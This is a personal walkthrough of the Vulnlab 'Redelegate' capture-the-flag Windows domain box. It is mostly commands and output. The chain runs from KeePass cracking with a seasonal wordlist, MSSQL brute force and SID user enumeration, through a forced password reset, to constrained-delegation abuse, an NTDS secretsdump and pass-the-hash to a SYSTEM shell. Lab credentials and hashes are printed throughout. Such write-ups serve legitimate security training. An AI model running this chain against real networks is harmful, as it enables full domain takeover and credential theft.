Here is my notes on REDELEGATE box from Vulnlab which deployed to Hackthebox.
REDELEGATE: 10.10.116.40
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 12:11AM 434 CyberAudit.txt
| 10-20-24 04:14AM 2622 Shared.kdbx
|_10-20-24 12:26AM 580 TrainingAgenda.txt
| ftp-syst:
|_ SYST: Windows_NT
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password #Interesting !, ask chatgpt to make a wordlist out "SeasonYear!"
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# kpcli --kdb Shared.kdbx
Provide the master password:
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# keepass2john Shared.kdbx > Shared.kdbx.hash
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# sudo leafpad Season-wordlist.txt #From ChatGPT.
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# john --wordlist=Season-wordlist.txt Shared.kdbx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024! (Shared)
1g 0:00:00:02 DONE (2024-11-25 12:53) 0.4219g/s 6.751p/s 6.751c/s 6.751C/s Spring2024!..fall24!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
GOT THE PASSWORD !
Fall2024!
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# kpcli --kdb Shared.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> find .
Searching for "." ...
- 7 matches found and placed into /_found/
Would you like to list them now? [y/N]
=== Entries ===
0. FS01 Admin
1. FTP
2. KeyFob Combination
3. Payrol App
4. SQL Guest Access
5. Timesheet Manager
6. WEB01
kpcli:/> show -f 0
Path: /Shared/IT/
Title: FS01 Admin
Uname: Administrator
Pass: Spdv41gg4BlBgSYIW1gF
URL:
Notes:
kpcli:/> show -f 1
Path: /Shared/IT/
Title: FTP
Uname: FTPUser
Pass: SguPZBKdRyxWzvXRWy6U
URL:
Notes: Deprecated
kpcli:/> show -f 2
Path: /Shared/HelpDesk/
Title: KeyFob Combination
Uname:
Pass: 22331144
URL:
Notes:
kpcli:/> show -f 3
Path: /Shared/Finance/
Title: Payrol App
Uname: Payroll
Pass: cVkqz4bCM7kJRSNlgx2G
URL:
Notes:
kpcli:/> show -f 4
Path: /Shared/IT/
Title: SQL Guest Access
Uname: SQLGuest
Pass: zDPBpaF4FywlqIv11vii
URL:
Notes:
kpcli:/> show -f 5
Path: /Shared/Finance/
Title: Timesheet Manager
Uname: Timesheet
Pass: hMFS4I0Kj8Rcd62vqi5X
URL:
Notes:
kpcli:/> show -f 6
Path: /Shared/IT/
Title: WEB01
Uname: WordPress Panel
Pass: cn4KOEgsHqvKXPjEnSD9
URL:
Notes:
-Brute-Force don't work, don't bother !
53/tcp open domain Simple DNS Plus
REDELEGATE\Marie.Curie:Fall2024!
#FROM MSSQL.
bloodhound-python -c All -u Marie.Curie -p 'Fall2024!' -d redelegate.vl --dns-tcp -ns 10.10.116.40
BloodHound Data:
Marie.Curie -> Member of Help Desk Group -> ForceChangePassword -> Helen.Frost User -> CanPSREMOTE -> DC.REDELEGATE.VL:
net rpc password "Helen.Frost" 'Password123!' -U "REDELEGATE.VL"/"Marie.Curie"%'Fall2024!' -S 10.10.116.40
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# net rpc password "Helen.Frost" 'Password123!' -U "REDELEGATE.VL"/"Marie.Curie"%'Fall2024!' -S 10.10.116.40
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# crackmapexec winrm 10.10.116.40 -u Helen.Frost -p 'Password123!'
SMB 10.10.116.40 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:redelegate.vl)
HTTP 10.10.116.40 5985 DC [*] http://10.10.116.40:5985/wsman
WINRM 10.10.116.40 5985 DC [+] redelegate.vl\Helen.Frost:Password123! (Pwn3d!)
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
sudo gobuster dir -u http://10.10.116.40/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar #RABBIT HOLE = NOPE !
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://redelegate.vl/ -H "Host: FUZZ.redelegate.vl" --fs 703 #EMPTY = NOPE !
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 17:39:35Z)
135/tcp open msrpc Microsoft Windows RPC
#NOPE, NO RPC !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
ldapv3 - NOPE unless account acquired !
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# crackmapexec smb 10.10.116.40 -u "" -p "" --shares
SMB 10.10.116.40 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.116.40 445 DC [+] redelegate.vl\:
SMB 10.10.116.40 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# crackmapexec smb 10.10.116.40 -u "Guest" -p "" --shares
SMB 10.10.116.40 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.116.40 445 DC [-] redelegate.vl\Guest: STATUS_ACCOUNT_DISABLED
#No Guest Account - NOPE !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open mssql
#For MSSQL, Try to attempt it blindly without relying on NMAP output or crackmapexec output because sometimes it works and sometimes it don't.
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# hydra -L users.txt -P Season-wordlist.txt 10.10.116.40 mssql
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-25 13:49:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 440 login tries (l:8/p:55), ~28 tries per task
[DATA] attacking mssql://10.10.116.40:1433/
[1433][mssql] host: 10.10.116.40 login: SQLGuest password: zDPBpaF4FywlqIv11vii
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-25 13:50:00
#FROM Shared.kdbx.
Enumerating AD Domain and Domain Users with MSSQL:
mssqlclient.py SQLGuest:'zDPBpaF4FywlqIv11vii'@10.10.116.40
SELECT DEFAULT_DOMAIN();
SELECT SUSER_SID('REDELEGATE\Domain Admins')
b'010500000000000515000000a185deefb22433798d8e847a00020000'
Convert it into a readable string with PowerShell:
$BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\WINDOWS\system32> $BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
PS C:\WINDOWS\system32> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
>>
PS C:\WINDOWS\system32> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>> $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\WINDOWS\system32> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
>>
PS C:\WINDOWS\system32> $SID.Value
S-1-5-21-4024337825-2033394866-2055507597-512
Take that $SID.Value into a quick bash loop script to enumerate AD Domain Users: #Take out the last digit such as 512.
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="***"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
rm query.sql
done
EXAMPLE:
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="zDPBpaF4FywlqIv11vii"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
rm query.sql
done
bash loop.sh > users.txt
┌──(root㉿kali)-[/home/kali/VL/REDELEGATE/10.10.116.40]
└─# cat users.txt
REDELEGATE\FS01$
REDELEGATE\Christine.Flanders
REDELEGATE\Marie.Curie
REDELEGATE\Helen.Frost
REDELEGATE\Michael.Pontiac
REDELEGATE\Mallory.Roberts
REDELEGATE\James.Dinkleberg
REDELEGATE\Helpdesk
REDELEGATE\IT
REDELEGATE\Finance
REDELEGATE\DnsAdmins
REDELEGATE\DnsUpdateProxy
REDELEGATE\Ryan.Cooper
REDELEGATE\sql_svc
crackmapexec smb 10.10.116.40 -u users.txt -p Season-wordlist.txt --continue-on-success | grep "[+]"
crackmapexec smb 10.10.116.40 -u users.txt -p Season-wordlist.txt --continue-on-success | grep "[+]"
SMB 10.10.116.40 445 DC [+] REDELEGATE\Marie.Curie:Fall2024!
Got Marie.Curie Credenetial !
REDELEGATE\Marie.Curie:Fall2024!
https://vuln.dev/vulnlab-redelegate/#getting-a-foothold
Hacking SQL Server Procedures – Part 4: Enumerating Domain Accounts
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open wsman
#FROM BloodHound-Data:
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# crackmapexec winrm 10.10.116.40 -u Helen.Frost -p 'Password123!'
SMB 10.10.116.40 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:redelegate.vl)
HTTP 10.10.116.40 5985 DC [*] http://10.10.116.40:5985/wsman
WINRM 10.10.116.40 5985 DC [+] redelegate.vl\Helen.Frost:Password123! (Pwn3d!)
evil-winrm -i 10.10.116.40 -u Helen.Frost -p 'Password123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> whoami
redelegate\helen.frost
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> hostname
dc
USER-SHELL !
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> whoami
redelegate\helen.frost
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> dir
Directory: C:\Users\Helen.Frost\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 9:05 AM 36 user.txt
t*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeEnableDelegationPrivilege with computer object FS01$ Priv Esc: #Useful if we cannot create a computer account or doing RBCD attack techniques.
Helen.Frost: whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set
BloodHound Data:
Helen.Frost -> GenericAll -> FS01$ <-- #This is a requirement for the priv esc to work.
Kali:
changepasswd.py redelegate/'fs01$'@redelegate.vl -newpass 'Start123!' -altuser redelegate/helen.frost -reset -altpass 'Start123!' -debug
changepasswd.py redelegate/'fs01$'@redelegate.vl -newpass 'Password123!' -altuser redelegate/helen.frost -reset -altpass 'Password123!' -debug
Target:
Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
Kali:
getST.py redelegate.vl/fs01\$:'Password123!' -spn ldap/dc.redelegate.vl -impersonate dc
export KRB5CCNAME=dc.ccache
secretsdump.py -k -no-pass dc.redelegate.vl -dc-ip 10.10.116.40
https://vuln.dev/vulnlab-redelegate/#privilege-escalation
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# secretsdump.py -k -no-pass dc.redelegate.vl -dc-ip 10.10.116.40
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'secretsdump.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
psexec.py -hashes :a066fbf49e79f43fffc449810227e399 Administrator@10.10.116.40
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.116.40.....
[*] Found writable share ADMIN$
[*] Uploading file PUuDcRvH.exe
[*] Opening SVCManager on 10.10.116.40.....
[*] Creating service juOH on 10.10.116.40.....
[*] Starting service juOH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
dc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
dc
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 604F-3743
Directory of C:\Users\Administrator\Desktop
10/30/2024 08:03 AM <DIR> .
10/20/2024 07:05 AM <DIR> ..
10/30/2024 08:04 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 9,447,956,480 bytes free
C:\Users\Administrator\Desktop>type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows